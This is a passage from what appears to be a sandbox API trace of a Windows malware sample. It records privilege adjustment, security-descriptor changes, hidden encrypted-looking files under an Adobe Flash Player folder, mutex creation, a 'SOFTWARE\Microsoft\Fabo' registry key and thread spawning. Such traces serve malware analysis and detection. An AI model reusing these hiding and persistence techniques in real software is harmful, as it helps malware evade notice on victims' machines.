TokenHandle=0x4f5f20c*=0x178) returned 1 [0060.081] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x4f5f214 | out: lpLuid=0x4f5f214*(LowPart=0x8, HighPart=0)) returned 1 [0060.083] AdjustTokenPrivileges (in: TokenHandle=0x178, DisableAllPrivileges=0, NewState=0x4f5f210*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0060.083] GetLastError () returned 0x0 [0060.083] CloseHandle (hObject=0x178) returned 1 [0060.083] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0060.083] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52141c0, lpbSaclPresent=0x4f5f244, pSacl=0x4f5f238, lpbSaclDefaulted=0x4f5f240 | out: lpbSaclPresent=0x4f5f244, pSacl=0x4f5f238, lpbSaclDefaulted=0x4f5f240) returned 1 [0060.083] SetNamedSecurityInfoW () returned 0x0 [0060.085] LocalFree (hMem=0x52141c0) returned 0x0 [0060.085] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0060.085] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x4f5f258 | out: lpFileSize=0x4f5f258*=529) returned 1 [0060.086] VirtualAlloc (lpAddress=0x0, dwSize=0x211, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0060.086] ReadFile (in: hFile=0x178, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x211, lpNumberOfBytesRead=0x4f5f264, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x4f5f264*=0x211, lpOverlapped=0x0) returned 1 [0060.089] CloseHandle (hObject=0x178) returned 1 [0060.089] wvnsprintfA (in: pszDest=0x5412128, cchDest=21, pszFmt="%d", arglist=0x4f5f1a8 | out: pszDest="1476366141") returned 10 [0060.090] wvnsprintfA (in: pszDest=0x5412128, cchDest=21, pszFmt="%d", arglist=0x4f5f1a8 | out: pszDest="1476366141") returned 10 [0060.092] wvnsprintfA (in: pszDest=0x5412068, cchDest=21, pszFmt="%d", arglist=0x4f5f1a8 | out: pszDest="1476366142") returned 10 [0060.093] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0060.095] WriteFile (in: hFile=0x178, lpBuffer=0x54032e0*, nNumberOfBytesToWrite=0x44f, lpNumberOfBytesWritten=0x4f5f25c, lpOverlapped=0x0 | out: lpBuffer=0x54032e0*, lpNumberOfBytesWritten=0x4f5f25c, lpOverlapped=0x0) returned 1 [0060.096] CloseHandle (hObject=0x178) returned 1 [0060.099] ReleaseMutex (hMutex=0x154) returned 1 [0060.099] CloseHandle (hObject=0x154) returned 1 [0060.100] SetLastError (dwErrCode=0x0) [0060.100] LocalFree (hMem=0x5208748) returned 0x0 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="4B") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="00") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="00") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="00") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="D5") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="86") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="D2") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="D8") returned 2 [0060.100] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="AB") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="6E") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="07") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="EC") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="44") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="CC") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="91") returned 2 [0060.101] wvnsprintfW (in: pszDest=0x4f5f188, cchDest=6, pszFmt="%02X", arglist=0x4f5f164 | out: pszDest="83") returned 2 [0060.101] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="4B000000D586D2D8AB6E07EC44CC9183") returned 0x154 [0060.101] CloseHandle (hObject=0x154) returned 1 [0060.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4f5f33a, cbMultiByte=4, lpWideCharStr=0x4ed0c50, cchWideChar=10 | out: lpWideCharStr="Fabo") returned 4 [0060.102] PathCombineW (in: pszDest=0x4ed09e0, pszDir="SOFTWARE\\Microsoft", pszFile="Fabo" | out: pszDest="SOFTWARE\\Microsoft\\Fabo") returned="SOFTWARE\\Microsoft\\Fabo" [0060.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4f5f344, cbMultiByte=8, lpWideCharStr=0x4ed0c50, cchWideChar=10 | out: lpWideCharStr="Onpiwaad") returned 8 [0060.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4f5f212, cbMultiByte=48, lpWideCharStr=0x4f5ef40, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\Desktop (create shortcut).igb룔쑱섈︖百뫆沼⡹搫䅢髽覍ﮥ홂妖樁즗Լ౐ӭӵ") returned 48 [0060.102] PathCombineW (in: pszDest=0x4ed0c68, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\Desktop (create shortcut).igb" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" [0060.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4f5f2ac, cbMultiByte=47, lpWideCharStr=0x4f5ef44, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\Windows PowerShell (x86).ezu룔쑱섈︖百뫆沼⡹搫䅢髽覍ﮥ홂妖樁즗Լ౐ӭӵ") returned 47 [0060.103] PathCombineW (in: pszDest=0x4ed0a48, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\Windows PowerShell (x86).ezu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" [0060.104] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x4f5f360 | out: phkResult=0x4f5f360*=0x178) returned 0x0 [0060.104] RegQueryValueExW (in: hKey=0x178, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x4f5f38c, lpData=0x0, lpcbData=0x4f5f370*=0x0 | out: lpType=0x4f5f38c*=0x0, lpData=0x0, lpcbData=0x4f5f370*=0x0) returned 0x2 [0060.104] RegCloseKey (hKey=0x178) returned 0x0 [0060.104] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0060.104] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x4f5f364 | out: lpFileSize=0x4f5f364*=0) returned 1 [0060.104] CloseHandle (hObject=0x178) returned 1 [0060.105] GetLastError () returned 0x0 [0060.105] GetLastError () returned 0x0 [0060.105] GetLocalTime (in: lpSystemTime=0x4f5f370 | out: lpSystemTime=0x4f5f370*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x16, wMilliseconds=0x20f)) [0060.105] GetCurrentThreadId () returned 0x7e4 [0060.105] GetCurrentProcessId () returned 0x2ec [0060.105] wvnsprintfW (in: pszDest=0x5401118, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x4f5f314 | out: pszDest="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: ") returned 86 [0060.105] wvnsprintfW (in: pszDest=0x54011c4, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x4f5f394 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0060.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0060.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5402128, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0060.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0060.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54021c0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0004, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0060.106] GetSystemTime (in: lpSystemTime=0x4f5ef60 | out: lpSystemTime=0x4f5ef60*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x16, wMilliseconds=0x20f)) [0060.106] SystemTimeToFileTime (in: lpSystemTime=0x4f5ef60, lpFileTime=0x4f5ef50 | out: lpFileTime=0x4f5ef50) returned 1 [0060.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5413088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0060.106] GetUserNameExW () returned 0x1 [0060.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0060.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54121c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="8A") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="00") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="00") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="00") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="B7") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="49") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="67") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="98") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="F6") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="14") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="59") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="35") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="AA") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="3E") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="27") returned 2 [0060.108] wvnsprintfW (in: pszDest=0x4f5ed48, cchDest=6, pszFmt="%02X", arglist=0x4f5ed24 | out: pszDest="60") returned 2 [0060.108] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x178 [0060.109] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0xffffffff) returned 0x0 [0060.109] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0060.109] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0060.109] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0060.109] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0060.109] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0060.109] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0060.110] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0060.110] GetCurrentThread () returned 0xfffffffe [0060.110] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x4f5efac | out: TokenHandle=0x4f5efac*=0x0) returned 0 [0060.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4f5efac | out: TokenHandle=0x4f5efac*=0x17c) returned 1 [0060.110] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x4f5efb4 | out: lpLuid=0x4f5efb4*(LowPart=0x8, HighPart=0)) returned 1 [0060.111] AdjustTokenPrivileges (in: TokenHandle=0x17c, DisableAllPrivileges=0, NewState=0x4f5efb0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0060.111] GetLastError () returned 0x0 [0060.111] CloseHandle (hObject=0x17c) returned 1 [0060.111] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0060.111] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52141c0, lpbSaclPresent=0x4f5efe4, pSacl=0x4f5efd8, lpbSaclDefaulted=0x4f5efe0 | out: lpbSaclPresent=0x4f5efe4, pSacl=0x4f5efd8, lpbSaclDefaulted=0x4f5efe0) returned 1 [0060.111] SetNamedSecurityInfoW () returned 0x0 [0060.118] LocalFree (hMem=0x52141c0) returned 0x0 [0060.118] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0060.118] GetCurrentThread () returned 0xfffffffe [0060.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x4f5efac | out: TokenHandle=0x4f5efac*=0x0) returned 0 [0060.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4f5efac | out: TokenHandle=0x4f5efac*=0x17c) returned 1 [0060.136] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x4f5efb4 | out: lpLuid=0x4f5efb4*(LowPart=0x8, HighPart=0)) returned 1 [0060.138] AdjustTokenPrivileges (in: TokenHandle=0x17c, DisableAllPrivileges=0, NewState=0x4f5efb0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0060.138] GetLastError () returned 0x0 [0060.138] CloseHandle (hObject=0x17c) returned 1 [0060.138] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0060.138] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x4f5efe4, pSacl=0x4f5efd8, lpbSaclDefaulted=0x4f5efe0 | out: lpbSaclPresent=0x4f5efe4, pSacl=0x4f5efd8, lpbSaclDefaulted=0x4f5efe0) returned 1 [0060.138] SetNamedSecurityInfoW () returned 0x0 [0060.140] LocalFree (hMem=0x52142e0) returned 0x0 [0060.141] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0060.141] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x4f5eff8 | out: lpFileSize=0x4f5eff8*=1103) returned 1 [0060.141] VirtualAlloc (lpAddress=0x0, dwSize=0x44f, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0060.141] ReadFile (in: hFile=0x17c, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x44f, lpNumberOfBytesRead=0x4f5f004, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x4f5f004*=0x44f, lpOverlapped=0x0) returned 1 [0060.143] CloseHandle (hObject=0x17c) returned 1 [0060.144] wvnsprintfA (in: pszDest=0x54122c8, cchDest=21, pszFmt="%d", arglist=0x4f5ef48 | out: pszDest="1476366141") returned 10 [0060.145] wvnsprintfA (in: pszDest=0x5412248, cchDest=21, pszFmt="%d", arglist=0x4f5ef48 | out: pszDest="1476366141") returned 10 [0060.146] wvnsprintfA (in: pszDest=0x54122c8, cchDest=21, pszFmt="%d", arglist=0x4f5ef48 | out: pszDest="1476366142") returned 10 [0060.147] wvnsprintfA (in: pszDest=0x5412248, cchDest=21, pszFmt="%d", arglist=0x4f5ef48 | out: pszDest="1476366142") returned 10 [0060.148] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0060.162] WriteFile (in: hFile=0x17c, lpBuffer=0x5402d40*, nNumberOfBytesToWrite=0x551, lpNumberOfBytesWritten=0x4f5effc, lpOverlapped=0x0 | out: lpBuffer=0x5402d40*, lpNumberOfBytesWritten=0x4f5effc, lpOverlapped=0x0) returned 1 [0060.163] CloseHandle (hObject=0x17c) returned 1 [0060.166] ReleaseMutex (hMutex=0x178) returned 1 [0060.166] CloseHandle (hObject=0x178) returned 1 [0060.167] SetLastError (dwErrCode=0x0) [0060.167] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xea60) returned 0x102 [0120.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ebf41a, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0120.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ec015d, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0120.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ec5984, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0120.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ebcbe5, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0120.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ebd254, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0120.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ebc238, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x4f5f3d4 | out: lpThreadId=0x4f5f3d4*=0xd80) returned 0x198 [0120.176] CloseHandle (hObject=0x198) returned 1 Thread: id = 7 os_tid = 0x24c Thread: id = 17 os_tid = 0xd4c Thread: id = 18 os_tid = 0xd50 Thread: id = 21 os_tid = 0xd6c [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="D9") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="00") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="00") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="00") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="F2") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="19") returned 2 [0120.181] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="E1") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="C7") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="79") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="E2") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="E7") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="AC") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="08") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="DF") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="D8") returned 2 [0120.182] wvnsprintfW (in: pszDest=0x725f118, cchDest=6, pszFmt="%02X", arglist=0x725f0f4 | out: pszDest="15") returned 2 [0120.182] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="D9000000F219E1C779E2E7AC08DFD815") returned 0xf8 [0120.182] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0120.182] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725f348 | out: 